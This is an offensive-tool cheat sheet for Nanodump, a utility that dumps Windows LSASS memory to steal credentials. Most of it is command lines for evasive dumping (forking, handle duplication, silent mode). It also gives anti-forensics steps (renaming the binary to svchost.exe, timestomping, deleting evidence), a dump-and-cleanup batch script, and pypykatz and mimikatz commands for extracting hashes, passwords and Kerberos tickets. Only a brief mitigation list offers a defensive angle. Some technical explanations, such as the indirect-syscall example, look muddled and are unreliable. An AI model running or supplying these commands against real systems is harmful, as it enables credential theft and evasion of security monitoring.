Nanodump
Nanodump is an advanced LSASS dumping utility designed to evade detection by using process forking, handle duplication, and minimal Windows API calls.
Installation
# Download precompiled binary
https://github.com/fortra/nanodump/releases
# Compile from source (Visual Studio)
git clone https://github.com/fortra/nanodump.git
cd nanodump
# Open nanodump.sln and buildBasic Usage
| Command | Description |
|---|---|
nanodump.exe --write output.dmp | Dump LSASS to file |
nanodump.exe --write output.dmp --fork | Fork LSASS before dumping |
nanodump.exe --write output.dmp --dup | Duplicate handle to LSASS |
nanodump.exe --help | Display help menu |
nanodump.exe --silent | Silent mode (minimal output) |
Evasion Techniques
Process Forking (—fork)
# Fork LSASS into separate process before dumping
nanodump.exe --write output.dmp --fork
# Advantages:
# - Original LSASS process unaffected
# - Harder to detect with process monitoring
# - Can dump original process while runningHandle Duplication (—dup)
# Duplicate LSASS handle instead of direct access
nanodump.exe --write output.dmp --dup
# Advantages:
# - Fewer direct API calls to LSASS
# - Avoids calling OpenProcess on LSASS
# - Evades behavioral detectionIndirect API Calls
# Nanodump uses indirect syscalls to minimize detection
# Bypasses EDR hooks on common APIs:
# - OpenProcess
# - MiniDumpWriteDump
# - VirtualQuery
# - ReadProcessMemoryLSASS Clone (—fork combined)
# Optimal evasion: Fork + manipulate clone
nanodump.exe --write output.dmp --fork
# Creates suspended fork, reads memory directly
# Original LSASS process never opened directlyDump Modes
Standard Dump
# Basic minidump of LSASS
nanodump.exe --write lsass.dmp
# Creates full minidump file usable with:
# - pypykatz
# - Mimikatz
# - VolatilitySilent Dump
# Minimal output, no console spam
nanodump.exe --write lsass.dmp --silent
# Reduces detection surface by avoiding console I/OFork Dump
# Create fork of LSASS before dumping
nanodump.exe --write lsass.dmp --fork
# Process tree shows:
# LSASS (original, still running)
# └─ LSASS (clone, created by nanodump)Advanced Options
Handle Duplication
# Duplicate existing LSASS handle
# Requires existing handle (e.g., from another process)
nanodump.exe --write lsass.dmp --dup
# Lower privilege requirements than direct OpenProcessMemory Region Selection
# Dump specific memory regions
nanodump.exe --write lsass.dmp --region 0x140000000
# Useful for:
# - Targeted credential extraction
# - Reducing file size
# - Avoiding unnecessary dataOutput Formats
# Different minidump types
nanodump.exe --write lsass.dmp --type full
nanodump.exe --write lsass.dmp --type normal
nanodump.exe --write lsass.dmp --type lite
# Full: Maximum data, larger file
# Normal: Standard minidump format
# Lite: Minimal viable dumpEvasion Techniques Breakdown
Avoiding MiniDumpWriteDump Hook
Traditional approach:
1. OpenProcess(LSASS)
2. CreateFileA/W (for output file)
3. MiniDumpWriteDump (hooked by EDR)
4. CloseHandle
Nanodump approach:
1. Use RtlCopyMemory/memcpy directly
2. Construct dump manually
3. Bypass MiniDumpWriteDump entirelyIndirect Syscalls
Direct syscalls:
mov rax, 0x0A ; NtOpenProcess
syscall
Indirect syscalls (via function pointers):
lea rax, [kernel32.OpenProcess]
call rax
Nanodump uses syscall stubs from PEB
Avoids hooking on imported functionsPEB Walking
1. Read TEB (Thread Environment Block)
2. Follow to PEB (Process Environment Block)
3. Access ntdll exports directly
4. Call syscalls without imported functions
5. Bypasses all import-based hooksOperational Security
Avoiding Detection
# Rename executable
ren nanodump.exe svchost.exe
svchost.exe --write output.dmp --fork
# Use legitimate directory
copy nanodump.exe %WINDIR%\Temp\nanodump.exe
cd %WINDIR%\Temp
nanodump.exe --write output.dmp --fork
# Clean up
del nanodump.exe output.dmpTimestomp Output
# Change file timestamps to blend in
# Use Windows built-in utilities or
powershell Set-ItemProperty -Path output.dmp -Name CreationTime -Value (Get-Date -Date "2020-01-01")Memory Wiping
# After dumping, consider wiping
# Original LSASS memory is still accessible
# Attacker responsibility to secure dump filePost-Exploitation
Parse with Pypykatz
# Convert dump to credentials
pypykatz lsa minidump output.dmp
# Extract:
# - NTLM hashes
# - Plaintext passwords
# - Kerberos tickets
# - Session keysUse with Mimikatz
mimikatz # sekurlsa::minidump output.dmp
mimikatz # sekurlsa::logonPasswordsVolatility Analysis
# Analyze dump with volatility
python vol.py -f output.dmp --profile=Win10x64 lsadump
# Identify kernel structures and credentialsComparison with Other Tools
| Feature | Nanodump | Mimikatz | Pypykatz | Procdump |
|---|---|---|---|---|
| Indirect Syscalls | Yes | No | No | No |
| Process Forking | Yes | No | No | No |
| Handle Duplication | Yes | No | No | No |
| Standalone Binary | Yes | Yes | No | Yes |
| Python Based | No | No | Yes | No |
| EDR Evasion | Excellent | Poor | Good | Poor |
Detection and Mitigation
Detection Methods
# Monitor for LSASS dump attempts
# - Suspicious OpenProcess calls to LSASS
# - MiniDumpWriteDump API calls
# - Indirect syscall usage
# - File writes from LSASS memory regionMitigation Strategies
1. Enable Windows Defender Credential Guard
2. Implement LSA protection (Registry DWORD: RunAsPPL = 1)
3. Deploy EDR with advanced behavioral detection
4. Monitor for LSASS access and memory dumps
5. Implement attack surface reduction rules
6. Restrict local admin accessCommand Line Examples
Full Evasion Dump
# Maximum evasion technique usage
nanodump.exe --write %TEMP%\~tmp.dmp --fork --silent
# Then extract credentials
pypykatz lsa minidump %TEMP%\~tmp.dmpTargeted Dump
# Dump only authentication packages
nanodump.exe --write auth.dmp --region 0x140000000Scheduled Dumping
# Dump and clean up via batch script
@echo off
nanodump.exe --write lsass.dmp --fork --silent
timeout /t 5
del nanodump.exeReferences and Further Reading
Related Tools
- Dumpert: LSASS dumping with syscalls
- Outflank-Dumpert: Similar approach with additional evasion
- PPLFault: LSASS protection bypass
- Pypykatz: Credential parsing
- Mimikatz: Original credential extraction framework
Last updated: March 2025 | GitHub